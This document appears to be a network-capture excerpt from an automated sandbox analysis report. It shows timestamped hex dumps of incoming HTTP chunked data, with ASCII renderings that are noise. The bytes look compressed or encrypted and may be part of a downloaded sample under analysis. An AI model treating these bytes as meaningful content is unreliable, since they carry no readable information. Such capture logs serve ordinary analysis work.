                                                        2022-11-20 22:29:22 UTC288INData Raw: 32 30 30 30 0d 0a 37 da d7 6b c6 19 21 a9 d3 41 a3 d9 39 ef 9f eb ff 9d e9 1f ce 6d 94 53 0b 7c 50 41 dd cf 15 11 f7 79 e8 b3 86 a1 51 8e 11 12 d7 a6 78 bf 24 94 1e b9 73 c7 d3 76 c6 3c 1c c1 81 e6 a8 d7 30 01 69 55 ae 2f 3d 23 ac c8 93 e4 b3 73 17 73 f5 4f bc 36 b9 c8 14 e7 28 a3 e4 e4 48 16 ab e9 bd 6c 9c 65 ee 01 f2 c6 96 0f 98 79 a0 b3 ed 3c ab 28 40 d5 0b 99 40 bd 55 8a 2c b3 94 93 1e 35 0f ce c7 9c f3 74 78 be 9d 9d c9 28 e8 24 ec 1f f1 89 db 2e a7 7e 15 4b 7a 40 4f 99 70 2e 2e 2c 0d fe 89 a9 5d 96 13 41 37 70 36 35 ca 6e a7 bb ac cc c0 8a c0 2c 91 61 4d 5c bd 59 01 79 46 90 af 70 27 88 2a 0d a1 f5 24 5d 5a 66 98 4d 67 f2 b3 42 f5 16 73 ae 55 10 17 dc 29 aa 2d 71 e9 0d 31 14 ad 18 1e db 5b 3f 50 6d c5 26 ba c9 8f b7 9a 32 ed d0 7b 28 e1 e5 01 ba b4
                                                        Data Ascii: 20007k!A9mS|PAyQx$sv<0iU/=#ssO6(Hley<(@@U,5tx($.~Kz@Op..,]A7p65n,aM\YyFp'*$]ZfMgBsU)-q1[?Pm&2{(
                                                        2022-11-20 22:29:22 UTC296INData Raw: 0c 89 ad 47 bc 3a
                                                        Data Ascii: G:
                                                        2022-11-20 22:29:22 UTC296INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC296INData Raw: 32 30 30 30 0d 0a 50 10 4b 48 8a c7 43 52 0c 6c d0 1a 60 b9 00 9b 76 93 14 83 b5 1d e8 63 b6 8f 7b 40 f9 5b c3 a0 0c f0 a9 28 34 ee 8a a7 f1 e8 5f 0f 06 03 d3 e4 14 0b d2 85 64 b1 38 4a ac cb 90 be d5 66 b0 bb a4 d5 b5 0a 06 b9 66 f2 be 28 7f d4 09 2c dc 61 82 48 ca 02 ac 73 dc 57 b4 99 8a c2 d7 7a fe e9 34 d4 64 4f 76 7e b4 35 2b 3f 7c 12 8c 3e 99 b2 6b 2e 81 82 38 5c fc 30 a5 a4 14 d0 ac 59 ed 01 99 da db 2b 62 7d fa 7d 8f 58 4d 27 57 22 3b a2 50 16 3f 42 6f 42 80 f8 cc 0c 0a e0 40 ed 08 e9 3e e6 9d 2e 20 88 b4 c8 33 e9 f5 df df e4 d4 de 70 44 a3 72 b2 1c 05 26 d6 e3 a0 b2 d7 55 75 d8 00 86 90 3d e0 59 f9 ee 36 c0 9e 6e f0 de 71 b0 bd 65 d2 cd e9 be 10 c2 a3 eb 6f 28 26 3c c8 26 96 13 9d 65 e4 2e 39 a4 f0 5a fc 87 cd 38 28 8b 96 4f ea b4 bb bd 05 79 ec
                                                        Data Ascii: 2000PKHCRl`vc{@[(4_d8Jff(,aHsWz4dOv~5+?|>k.8\0Y+b}}XM'W";P?BoB@>. 3pDr&Uu=Y6nqeo(&<&e.9Z8(Oy
                                                        2022-11-20 22:29:22 UTC304INData Raw: dc d6 4e 11 86 99
                                                        Data Ascii: N
                                                        2022-11-20 22:29:22 UTC304INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC304INData Raw: 32 30 30 30 0d 0a f9 50 32 6c b8 70 4a ef 8b a6 a8 8b ae aa 21 9a 77 0c 6f 9e 2e 35 58 ad e5 57 aa 99 63 78 28 52 4c cd f2 95 af 7f ab 7a 8c 38 3e d0 e2 7d 18 88 41 eb cb e0 01 f7 2e f0 df 76 a2 e9 b6 87 a4 82 de 21 21 21 7e 30 69 1c 75 45 40 9d d4 5d 7b 7c cf 0f dd ec dd 25 b1 07 30 0c f8 04 69 1b 2c 9e b8 7a 9b 05 52 2c ae 10 ae 19 42 cb b4 d4 17 1c 85 f0 c5 fb 0a cc 62 73 4a 48 b8 57 44 45 aa eb 5d cf 71 36 73 60 c3 92 9b 67 46 41 8e a8 bd b4 5e 5b 40 33 38 b4 2d 20 59 b4 45 69 4a 99 03 dc 52 1b b9 96 67 41 bb f8 43 9a 61 b6 65 83 92 42 1c 5c 56 be 93 39 ce 3c 63 34 68 ca be 0d 6e 0f 48 ec f8 90 63 07 1d ba fb 1c ed ba 74 07 64 4f dd 28 7a d6 0e 03 91 7b aa ed 2d a1 af 45 35 f6 5d 73 ac 0a 2b 1c 96 e5 ac 14 18 71 ac 50 ab 9b 5a 36 ed 5f 96 60 ec 0d 3f
                                                        Data Ascii: 2000P2lpJ!wo.5XWcx(RLz8>}A.v!!!~0iuE@]{|%0i,zR,BbsJHWDE]q6s`gFA^[@38- YEiJRgACaeB\V9<c4hnHctdO(z{-E5]s+qPZ6_`?
                                                        2022-11-20 22:29:22 UTC312INData Raw: 42 a2 23 1c 33 34
                                                        Data Ascii: B#34
                                                        2022-11-20 22:29:22 UTC312INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC312INData Raw: 31 66 66 38 0d 0a 8f 38 d2 30 6b 87 9d f8 4d 86 00 9e 1a 53 b4 f9 2d f9 e6 cb dd 17 c4 89 7e e6 af e0 b9 7b 87 bd 64 c7 00 ab 12 ff 5c 11 88 87 4f 1f bb 3f 26 fa 26 7f 5d f8 1c fe 1c 7d 4e 0b f6 1c ae 44 51 ae 88 92 39 5e e4 7a ef 6c 6e 45 4b b5 e3 43 77 44 38 7d d7 3a f4 ac 06 ab 0d 82 49 ef 7e d9 82 d2 18 f2 ea 0e 62 11 33 fe e3 ef ca f9 48 f7 d1 ac ce 33 2a e0 04 da f3 c6 65 64 bb c2 7b 60 84 83 f5 aa 0f 0b 50 ca 6b ae 74 df 8d 1a 28 26 6e 84 bd 0a 18 2a d8 4b cf 0b a4 4a 7e 00 72 ce e7 19 67 ef 72 43 e7 19 07 cf da 50 d2 7a 95 15 e6 d0 5d 21 0a 85 7e 9a d9 d3 0f 57 11 74 b6 b3 cb d5 b6 7b 0b 11 89 3f b5 7e 1c 03 b1 e6 37 91 f6 3f df 37 7a 3f cd e8 c9 b6 b5 96 df 59 52 79 8e 2f 3f b7 e6 5d 64 39 0c 22 a3 1b 43 e6 ce 2b 5e ed 11 00 d7 73 ad a8 08 c4 98
                                                        Data Ascii: 1ff880kMS-~{d\O?&&]}NDQ9^zlnEKCwD8}:I~b3H3*ed{`Pkt(&n*KJ~rgrCPz]!~Wt{?~7?7z?YRy/?]d9"C+^s
                                                        2022-11-20 22:29:22 UTC320INData Raw: 32 30 30 30 0d 0a
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC320INData Raw: 41 09 dc 52 42 e9 13 96 47 53 df 48 54 e4 c8 99 23 dc 69 e1 1f 9b 64 35 8d ce 77 c6 55 9e 93 73 8f 28 78 d0 6b 8e 31 5e f9 87 40 b5 b8 59 35 0e 2c 47 a3 af 05 60 c1 eb 31 1f 71 86 0b cd a7 bd 41 85 5a a7 1c 5b f6 d5 a7 2b 1d a7 53 0c e1 0d d6 25 11 dc 5a ef 97 e8 ed d2 0b c9 45 94 6b 8f c6 b6 3d 9b 1f 76 93 e7 3a 12 82 35 e9 ab 07 d2 fb b1 d6 e8 8f e4 84 12 79 fb 02 cd b3 46 28 96 a4 eb 5d a8 e7 bf bb aa ac bd ba 5f 93 8e 26 f5 01 ba 90 e2 49 1e 7b b3 7b cd e8 43 73 20 c9 d5 da b5 e9 f2 7d 78 3e fb dd da 07 41 66 07 7d c6 4c a4 d9 f9 29 80 95 73 de 15 a2 b6 44 dc a2 d9 26 45 cf c3 a0 5a 7a 23 20 27 bb eb 73 51 cf ad db a0 0e 4e 42 1c 67 c8 c2 a9 1f 5b 03 f4 2d 6f 61 78 2b b5 91 74 0f 9d e1 41 46 00 bb c6 1d 4b a2 ab 0f da 58 a4 40 25 97 e5 51 92 d5 ff c3
                                                        Data Ascii: ARBGSHT#id5wUs(xk1^@Y5,G`1qAZ[+S%ZEk=v:5yF(]_&I{{Cs }x>Af}L)sD&EZz# 'sQNBg[-oax+tAFKX@%Q
                                                        2022-11-20 22:29:22 UTC328INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC328INData Raw: 32 30 30 30 0d 0a 13 18 a1 ee 69 23 c6 ba c1 54 63 79 a2 38 f3 f7 88 52 47 39 91 0a 2f 80 72 1d 2a 3d c0 04 69 d1 56 bf 5f 52 40 64 35 ef ba 81 d5 81 8e dd ec d2 a9 b6 82 cd ab ee 23 7a 48 bf f4 d4 16 eb 77 ad e4 47 1a 8b 6e 6e aa fe 4c 3c b3 04 8a a1 c5 53 6a 04 69 4e 80 16 3e 2e 65 bd ab 6a e4 eb c5 e6 0f 7b 9c d9 2e b8 01 eb 7c 11 4b 1e 8b 95 79 ea d9 17 5d 5b 2a a3 33 76 8b 08 12 cd fc ff 4d 42 ad f3 45 90 d4 c7 23 aa ae b5 54 cc 1e fe cc 2f 91 ac e9 64 a0 18 98 88 99 dd cd 91 44 f4 05 45 af 96 56 2f 71 ab 9e 35 21 ed df 6e 23 72 df c4 44 5d 89 f4 37 44 bc 15 3d 71 bb 9a f6 c1 97 42 32 57 5c a5 76 a2 32 30 a0 59 36 fe 7c 4c b2 c6 75 e2 c7 51 de 41 b0 dd 2b 41 a0 74 8e 26 3b cc b4 45 95 54 86 b7 a2 ec 13 55 a4 2c 6d b3 29 c6 d6 c2 cc 66 2b b8 60 7b 25
                                                        Data Ascii: 2000i#Tcy8RG9/r*=iV_R@d5#zHwGnnL<SjiN>.ej{.|Ky][*3vMBE#T/dDEV/q5!n#rD]7D=qB2W\v20Y6|LuQA+At&;ETU,m)f+`{%
                                                        2022-11-20 22:29:22 UTC336INData Raw: d2 45 5b 0a bd da
                                                        Data Ascii: E[
                                                        2022-11-20 22:29:22 UTC336INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC336INData Raw: 32 30 30 30 0d 0a 83 f4 f7 28 16 68 f2 c8 88 72 17 6f 42 d1 6e a8 5e 1d a4 b3 e1 59 59 e2 91 fc 8c 53 8b a5 ff 19 09 f3 14 ef 85 55 50 4b f8 0f 07 ef 8d b7 cf b7 c5 3e 3a 9c c1 d8 c9 07 e3 ac bd 0b 8d 51 e3 e6 e4 fe 5c 81 c9 79 7d bc e9 f0 11 de 4d cd 39 a1 0e 5a 70 b8 59 ca 23 e3 9e a8 76 77 a9 0a 49 41 49 b0 aa 2c 23 67 d2 cc b9 c1 3a 2e b5 48 0c e1 8d c9 09 3b 85 7f 33 09 47 39 36 17 d0 9c bd ef f5 a2 2c b9 df 99 3a fb 09 8f b5 16 7d 1b b6 b1 6d 97 96 f5 ca 51 08 10 09 5a 41 18 1e 47 ea bd 39 4e ce e1 b0 01 a4 28 dd 66 8e df 36 0b 4e 4a 57 02 94 06 61 d7 9f fc 3b 2c 5e 11 bf c3 67 fa 66 a4 9c 08 a9 96 cf db 73 b9 a6 0c 8c ac 62 24 82 0a 77 ad 17 c0 0e a5 6f 5a c0 07 c9 5b 07 4f 3a c1 b7 65 fd 61 07 79 04 4a ad 26 5c 65 29 60 2e c7 47 19 4d 95 bb fc 12
                                                        Data Ascii: 2000(hroBn^YYSUPK>:Q\y}M9ZpY#vwIAI,#g:.H;3G96,:}mQZAG9N(f6NJWa;,^gfsb$woZ[O:eayJ&\e)`.GM
                                                        2022-11-20 22:29:22 UTC344INData Raw: 2e 7c fe 11 1b 06
                                                        Data Ascii: .|
                                                        2022-11-20 22:29:22 UTC344INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC344INData Raw: 32 30 30 30 0d 0a 04 4e 75 91 b7 1e d9 25 ea 4a be 6e 05 ce 4d 8a 9e 0a c5 2d 7a 49 35 5e a0 91 26 c9 37 2d 6f ee a1 42 9e 8c ff 14 31 29 db d3 0a fe 02 54 b9 a5 e7 5e 77 f4 2e 29 dc b8 ca 7c 92 79 ff 67 cf 40 05 2c ba 00 36 73 34 8e aa 43 fc fb a5 5e b4 60 69 9a 5b e2 56 a5 6d f7 c8 cf 2a e5 b7 f4 58 53 53 d3 35 41 74 81 18 12 31 91 64 7f 88 1e 52 29 59 5e 1c d4 b0 39 0c eb 10 6c 09 bc d9 cb b1 d6 fe 7c e3 55 f9 6d c3 82 5b 3b 06 df da 4c b9 5d 80 ae e7 8c 4b b0 17 a8 29 79 c6 33 cf 17 ed 03 7a 7d 0e e6 d9 20 14 f6 44 f4 f6 0c e1 67 2e e9 a2 f7 e9 25 46 a3 24 8f d4 39 28 96 bd e4 ed e6 4a 00 c3 f1 90 98 24 ed 34 0f 21 5f 40 71 37 ef aa e0 7d d0 4c 2a 75 62 e5 1b 38 d9 ac a6 ca 0b c0 20 e9 90 e8 ff 32 c7 49 a5 01 6f 8a c9 93 38 fe 33 6d a3 1a 48 22 fa ec
                                                        Data Ascii: 2000Nu%JnM-zI5^&7-oB1)T^w.)|yg@,6s4C^`i[Vm*XSS5At1dR)Y^9l|Um[;L]K)y3z} Dg.%F$9(J$4!_@q7}L*ub8 2Io83mH"
                                                        2022-11-20 22:29:22 UTC352INData Raw: 9a 7e 40 9a b9 05
                                                        Data Ascii: ~@
                                                        2022-11-20 22:29:22 UTC352INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC352INData Raw: 32 30 30 30 0d 0a 57 de 02 8d 7a 90 08 ea b7 1c 7b 81 39 bd d3 b6 d1 d7 6d 6c 67 33 2d 19 9b 6e 37 42 7c 41 a9 6d 24 47 9d b5 4d 3d 65 87 9f 22 ab 37 2f a4 fc a0 dd 66 4f 38 0d c5 19 03 96 37 e5 34 c5 57 5d 65 12 ec a0 49 5e 7e 4b a9 09 76 f7 7f c8 49 22 8c f4 51 80 1e 2a 0d 95 68 e6 2d 1f ea 4a 3c 22 ff 34 91 6a 02 51 fd b0 9c 8d ec 07 cd 59 7c 4f fa 57 0a bb 74 44 95 8e 7c 91 da 7d d8 5f bf f0 3d f7 46 8b 1d 59 86 03 56 1a 24 7f 50 8e cc cb e8 74 72 72 79 88 d9 7b 3b 40 fb 3c 7e 07 6b 3b 2b 27 8b 0a 72 01 ae 65 96 2b 4b a6 75 b9 af 9e 89 c1 9f 74 18 b9 01 37 a4 f6 7b c3 80 a8 bd 75 65 5e 3f c4 f0 62 9c 2c 0d 72 74 50 a5 46 50 32 41 4b a4 5b c8 ed 81 90 dd b8 01 48 62 36 54 af 71 fc ca 95 31 b6 b6 f6 4c 26 a9 e6 0a d7 81 14 70 c3 1a b0 a6 bd b0 e9 c2 58
                                                        Data Ascii: 2000Wz{9mlg3-n7B|Am$GM=e"7/fO874W]eI^~KvI"Q*h-J<"4jQY|OWtD|}_=FYV$Ptrry{;@<~k;+'re+Kut7{ue^?b,rtPFP2AK[Hb6Tq1L&pX
                                                        2022-11-20 22:29:22 UTC360INData Raw: 4d e2 3f d9 9c 8b
                                                        Data Ascii: M?
                                                        2022-11-20 22:29:22 UTC360INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC360INData Raw: 32 30 30 30 0d 0a 77 54 85 42 3e ed 97 d6 b0 bf 3e 2d 44 ab cd 50 2d a9 d4 22 57 77 2e 10 66 fc da d0 a2 96 52 88 4d c4 62 a0 87 1f 6c 62 a9 f4 90 72 65 93 38 eb f2 17 f6 19 f7 41 e0 48 ec a0 23 bc 06 27 de e8 bc 2d c0 69 cc c0 96 0c c5 36 21 4a 95 d4 3c 3a ba 82 6a 34 03 ad 40 9c 03 06 fe f6 52 7d ea 9a ff 43 c2 29 81 e3 aa 00 0b cc c3 2a 05 6b 99 1e 9a b4 73 a8 dd c9 5e f6 8d 02 18 96 c9 f1 14 80 1f b8 18 e0 ec 9a e7 40 09 35 5d cc 85 b8 84 8e 4a c9 22 8a 6d 03 94 35 89 a5 9d e8 4b b5 6d 1e 88 9f 2d a3 87 19 20 d4 5c 3b e5 d0 b3 78 66 04 ed 1e 49 94 90 54 59 6e cb eb 9d ae 5d a5 aa dd 6c de f0 09 15 20 6c c9 98 22 a8 fa cf 7a 62 f0 72 01 9a 92 5a d0 c2 04 1d 4d 3b 15 2b 00 b1 0a ae 55 72 8d 60 94 d7 fc 4a ff 21 21 b3 2f 62 c2 0a 68 bc 27 9f 43 32 2d 4a
                                                        Data Ascii: 2000wTB>>-DP-"Ww.fRMblbre8AH#'-i6!J<:j4@R}C)*ks^@5]J"m5Km- \;xfITYn]l l"zbrZM;+Ur`J!!/bh'C2-J
                                                        2022-11-20 22:29:22 UTC368INData Raw: 52 97 0b 5f 17 95
                                                        Data Ascii: R_
                                                        2022-11-20 22:29:22 UTC368INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC368INData Raw: 32 30 30 30 0d 0a f5 fb 49 49 85 9e ec 98 f8 20 a3 3e ed c9 ae 9b ed d5 75 32 44 19 62 35 dc bb ff 9b 15 33 39 63 3f de af 05 30 87 bb 49 bf 46 03 97 64 55 49 14 cd 17 07 b7 ac db 5f 6e 25 bc 3e 2f e0 68 5e 61 e2 35 92 ec 66 8b d6 26 d7 41 4c 56 32 93 24 eb cf 68 25 d4 69 56 2c 84 71 cb d9 ac 94 b4 44 bd d6 b3 bd bd fa 31 e4 f4 c6 d7 f2 1b 0a b4 69 f5 d9 df ec b0 a1 90 46 3e 0c 06 8e 52 15 57 40 be 8e fe 71 81 7f 07 9f 4b 18 cc 9e 5a 5e 50 20 e2 16 92 d2 05 0d 7a 68 6d 66 0f b0 54 08 5e 69 82 c2 15 05 44 3d 69 94 d2 48 ad 2c 42 46 e7 d2 ce 7e 6b 05 c5 f7 32 06 8a d1 5f 45 59 f0 2d f2 1d 9e b0 fa 2c b7 e0 23 0f 9a f9 f5 43 03 e0 31 47 e3 e3 28 7a e3 60 48 65 d7 6d 6c 01 4e 18 9e 73 95 f1 db 5e 2a 06 aa e1 88 1d f7 84 0e dd a1 0d b0 ca 94 60 37 82 99 69 b5
                                                        Data Ascii: 2000II >u2Db539c?0IFdUI_n%>/h^a5f&ALV2$h%iV,qD1iF>RW@qKZ^P zhmfT^iD=iH,BF~k2_EY-,#C1G(z`HemlNs^*`7i
                                                        2022-11-20 22:29:22 UTC376INData Raw: 22 ec 61 f3 98 b2
                                                        Data Ascii: "a
                                                        2022-11-20 22:29:22 UTC376INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC376INData Raw: 31 66 66 38 0d 0a 4c b1 03 fe b6 ac cd 8e 14 82 75 d7 be 00 9a 77 b6 c8 f9 be 5c d4 30 9c 13 34 49 c6 53 ee 6c e9 b0 2b 2e ae 84 06 ad ed 09 f0 4d 9c 49 fe 6e 42 41 1a 5d 12 85 0d 5f c2 bb 0b 44 4c 9b 9f 16 6d d7 53 96 9b eb f9 44 9f 87 0e da f2 c6 fd 46 56 5b ea 38 1d 81 1a 6a a5 f0 62 aa b2 93 c1 a2 7c f7 83 c3 3f ec 7a 91 ee 30 be 71 3b 80 cc e3 b1 6e e3 ff 93 87 3c 23 b0 39 ac d7 da 1b 7e 2f 58 9c 31 af c9 4f 40 2f 0f dd a4 5e 01 e0 31 a8 66 32 51 73 7b 01 d7 bf 9c 0e 71 ba 3a 7d e4 bc 5f 33 a0 18 3b d6 88 bf f4 8f 3b 10 5e d6 ad 0b 23 af b4 d7 8c ca 99 c7 bb f1 4e bc c7 02 f2 40 ec c9 d0 d5 3b 1b d1 75 f6 27 d5 c8 e0 ac 76 76 dc 91 8e 80 8a 44 5e c1 a1 d8 59 67 f7 a0 d6 f2 b9 41 4c 7d 83 5f 1e 9b 4d 67 c6 aa e5 13 04 80 81 e0 04 7c 93 0f 60 51 d7 a5
                                                        Data Ascii: 1ff8Luw\04ISl+.MInBA]_DLmSDFV[8jb|?z0q;n<#9~/X1O@/^1f2Qs{q:}_3;;^#N@;u'vvD^YgAL}_Mg|`Q
                                                        2022-11-20 22:29:22 UTC384INData Raw: 32 30 30 30 0d 0a
                                                        Data Ascii: 2000
                                                        2022-11-20 22:29:22 UTC384INData Raw: 3d 28 6b 14 68 c5 0b 9e 77 41 f1 df d0 2c fb 7f a2 21 1d 62 0d 16 ab c6 77 73 c6 e2 46 f3 2a 23 8e 0a 1b aa 37 1c c4 d2 9a 01 1c e6 d1 ee f8 21 0a 94 e1 47 20 46 49 95 53 da c7 88 03 33 1b 6d 72 8d c3 45 bd 5b ac 71 20 51 c8 38 85 6e b5 0e 40 13 4b d2 8c da 5d 68 ac 37 1b c4 0c f1 7c d9 73 e2 de f7 92 6e 41 ab 20 57 df 4d 81 d5 6a a5 37 ce 14 b4 ea 29 1a c0 07 f7 4e b7 8b 05 bd 72 ad 8a 98 87 a3 a5 45 5f 04 5f c8 e3 31 32 e1 97 d3 cc 4b a6 c3 51 ae c7 3a b4 55 8b f3 b4 eb 7f 6d a1 b2 1c 4b 46 4d c8 d7 fe 8b ef fe 71 26 f4 bc 8a 24 4a 5a 5d c8 36 84 b8 a7 82 9c 2b d7 45 56 bd fd 95 55 3f 4d c3 c7 d4 08 2e 05 0f 37 21 e7 32 d4 c6 5f 92 b7 ba 4f c5 19 f7 ac 77 54 79 0a 3f e1 5d 8a 8c e6 07 0f 94 e5 21 60 41 cd 7f e9 ab 5f 3c a5 fc b3 78 dd 11 f9 e1 3d f6 25
                                                        Data Ascii: =(khwA,!bwsF*#7!G FIS3mrE[q Q8n@K]h7|snA WMj7)NrE__12KQ:UmKFMq&$JZ]6+EVU?M.7!2_OwTy?]!`A_<x=%
                                                        2022-11-20 22:29:22 UTC392INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC392INData Raw: 32 30 30 30 0d 0a 33 6c 1b a3 bf ea bd 26 0c 2a b9 f3 f5 1f 19 56 31 af ba fc 79 cd 26 3c af 9a 4c b1 8b 39 e9 b6 3d 82 93 17 c4 6d be d5 64 db 1c 48 47 68 b0 51 ca 72 98 4a ba 4e 31 c4 13 68 9c d9 53 08 b0 64 0d 25 02 e2 92 ff a4 f3 2a 3c 92 8b 5f c1 e5 34 43 96 1f 05 44 db 75 cc 80 07 48 54 2b f1 bf 9e 4c 0e 68 eb 3a 42 a3 d3 bb fb e9 33 5e b5 52 90 2f 73 29 5a 00 40 f1 02 e2 de 7e 65 25 3c 47 99 6a 35 b2 33 81 05 a4 de 55 39 e1 15 8e 91 4a 70 75 c2 50 b5 33 65 44 64 68 d9 8b 03 bb 6f 1a 56 90 5e ff 2b 3b d3 7d d1 db 75 24 6b f0 a3 0e 8b 8c 60 58 c8 40 80 3a c9 0d 7e 67 55 50 db b8 19 53 4a 64 84 01 a3 e5 aa 4f 7d e0 b8 6a 70 66 14 d5 93 82 ad a1 8d 89 ac 53 47 87 4d 27 93 0c 1b 26 ea 98 3b a0 17 a9 03 16 eb b3 6d 23 cb ae ad 00 21 7f 75 99 ba a3 c1 7a
                                                        Data Ascii: 20003l&*V1y&<L9=mdHGhQrJN1hSd%*<_4CDuHT+Lh:B3^R/s)Z@~e%<Gj53U9JpuP3eDdhoV^+;}u$k`X@:~gUPSJdO}jpfSGM'&;m#!uz
                                                        2022-11-20 22:29:22 UTC400INData Raw: c8 a2 2b dc 9d e6
                                                        Data Ascii: +
                                                        2022-11-20 22:29:22 UTC400INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC400INData Raw: 32 30 30 30 0d 0a e2 2b a3 c0 75 69 1f 3d c9 ea cb 6a af 95 24 5e d6 2a 89 cf 90 07 9f f6 73 24 bd 12 cc 6a 20 38 2c a4 34 03 b2 54 67 3a bd 11 82 d6 f7 60 a3 b7 06 ba 57 43 97 05 54 71 fa ef d5 93 13 23 b7 ff 2c a8 f5 53 b6 42 9f e1 4b 50 22 54 dd b3 47 dc 10 23 04 58 fc 7d 30 5a 01 f1 a6 0c d1 6b e8 b9 32 0a e4 80 60 20 d0 d2 29 11 5e 09 d5 ef 93 e6 4b dd be b3 2e 12 89 a2 1d 65 d1 28 76 f2 c4 70 bd fe 35 23 01 1a 38 a4 58 53 1c 53 cf 8a 30 cb ef 9d 88 0b 96 38 48 9b f1 99 34 a8 23 46 c9 58 66 c0 ec 46 4c b7 0a 62 7d 1a fa 4a 52 40 1e 7e b0 b3 84 16 b7 a3 be 36 3f 33 40 af 84 e7 64 c6 58 c1 29 12 1c 91 a1 a2 6f 62 14 d6 73 38 e6 ed 56 77 bd 0b fc 6d f7 a8 26 b5 81 d5 98 95 61 f3 8c cc 23 57 16 65 4a 7c c5 fc 94 53 50 60 5d 64 33 e7 a6 ad 3f af 25 e7 84
                                                        Data Ascii: 2000+ui=j$^*s$j 8,4Tg:`WCTq#,SBKP"TG#X}0Zk2` )^K.e(vp5#8XSS08H4#FXfFLb}JR@~6?3@dX)obs8Vwm&a#WeJ|SP`]d3?%
                                                        2022-11-20 22:29:22 UTC408INData Raw: f9 1c 4b 39 6f 63
                                                        Data Ascii: K9oc
                                                        2022-11-20 22:29:22 UTC408INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC408INData Raw: 32 30 30 30 0d 0a e1 d6 d6 29 84 88 d8 54 a6 46 73 36 03 98 bb b3 fa 48 c4 ce 05 7a 84 26 f0 30 e5 4b df e0 8f a8 2b 36 ca b0 b2 a9 40 fd 71 73 fc 81 1c d9 b0 0b 43 19 e3 56 5a 59 23 40 d4 60 26 5f 1a cc e4 da 28 a0 19 ee e0 02 65 3d 37 51 a3 2a a3 16 7a 92 a5 00 ba 72 03 c2 dd f0 a8 65 df f6 63 73 77 12 aa c8 65 a7 bd 7c 05 bc 95 54 d9 dd 1c 5b 4d b0 30 7f 99 e9 24 72 ab 48 a9 43 d2 9c 0b 98 89 97 fd 64 dd 91 02 ae a3 af a5 4f a1 06 79 1c ca f0 39 d7 a2 8b dc 04 d7 07 e8 05 7f d0 ac f7 77 65 9f b1 1a 63 86 86 36 aa 7a 1a 05 20 8d e7 6c 0f d1 2b 06 fe 59 5f b2 fa ce 1d 69 f1 19 2d d8 df 8f 8b f0 11 71 bd d5 a1 8f 7a 16 a4 22 12 5b df fc f5 50 6d 88 9c 2d 70 aa 0c a6 1b 43 c0 9f 9d 4e 99 2c 52 75 02 a4 ad 0e e7 f5 16 7e b8 47 1f 86 25 da 9d de 8b 0a 8d 3b
                                                        Data Ascii: 2000)TFs6Hz&0K+6@qsCVZY#@`&_(e=7Q*zrecswe|T[M0$rHCdOy9wec6z l+Y_i-qz"[Pm-pCN,Ru~G%;
                                                        2022-11-20 22:29:22 UTC416INData Raw: 61 7d 4e 4a 4c ec
                                                        Data Ascii: a}NJL
                                                        2022-11-20 22:29:22 UTC416INData Raw: 0d 0a
                                                        Data Ascii:
                                                        2022-11-20 22:29:22 UTC416INData Raw: 32 30 30 30 0d 0a 5a e2 c7 a6 ec 4b 7c c4 71 04 87 16 3a ca 62 26 31 37 1e e8 66 df 2c eb 64 64 d8 4d b6 09 70 4c c5 7f 86 47 8c d7 08 6f c2 20 63 3f f6 60 84 77 18 92 4a 4e cd b7 c6 dd ba 6e 77 3c 9c 12 44 7c 92 74 c8 e3 90 5f 77 6a 32 57 c3 a9 c9 44 0f 5d 78 5f 02 c0 0b 94 c9 f2 df 1f bf 42 37 ee 35 9d c1 0d 40 d5 0b 7f c1 c5 fb 3f 27 c5 58 d4 e9 8c b1 e6 05 4a 8a b7 97 3d 5e f5 a2 ce aa 93 e6 8a 0c aa 5f 9c 4d d9 2d bf 57 63 a8 a6 3a a9 e2 a5 2f 4d 4d 8d 04 67 81 f1 f8 b8 4a 3f a1 af 68 0c 44 c0 bb 14 c3 9a 79 1f 94 17 e5 e3 39 39 50 97 fe f1 7b 4f 12 4b f5 d1 56 58 e8 21 65 e2 d9 79 ea c8 b4 a4 3c 7e ef a9 45 c1 03 f1 bb 4f 55 fa 36 68 0c 6d 46 dc 99 af cc 0d a5 70 04 fd e5 7e 4b 7a 0d 35 b4 df d3 03 b3 fc a8 1c 3d b2 66 f5 bc 7f b9 97 32 fb e2 08 71
                                                        Data Ascii: 2000ZK|q:b&17f,ddMpLGo c?`wJNnw<D|t_wj2WD]x_B75@?'XJ=^_M-Wc:/MMgJ?hDy99P{OKVX!ey<~EOU6hmFp~Kz5=f2q
                                                        2022-11-20 22:29:22 UTC424INData Raw: 83 d8 24 3f f8 49
                                                        Data Ascii: $?I
                                                        2022-11-20 22:29:22 UTC424INData Raw: 0d 0a
                                                        Data Ascii:
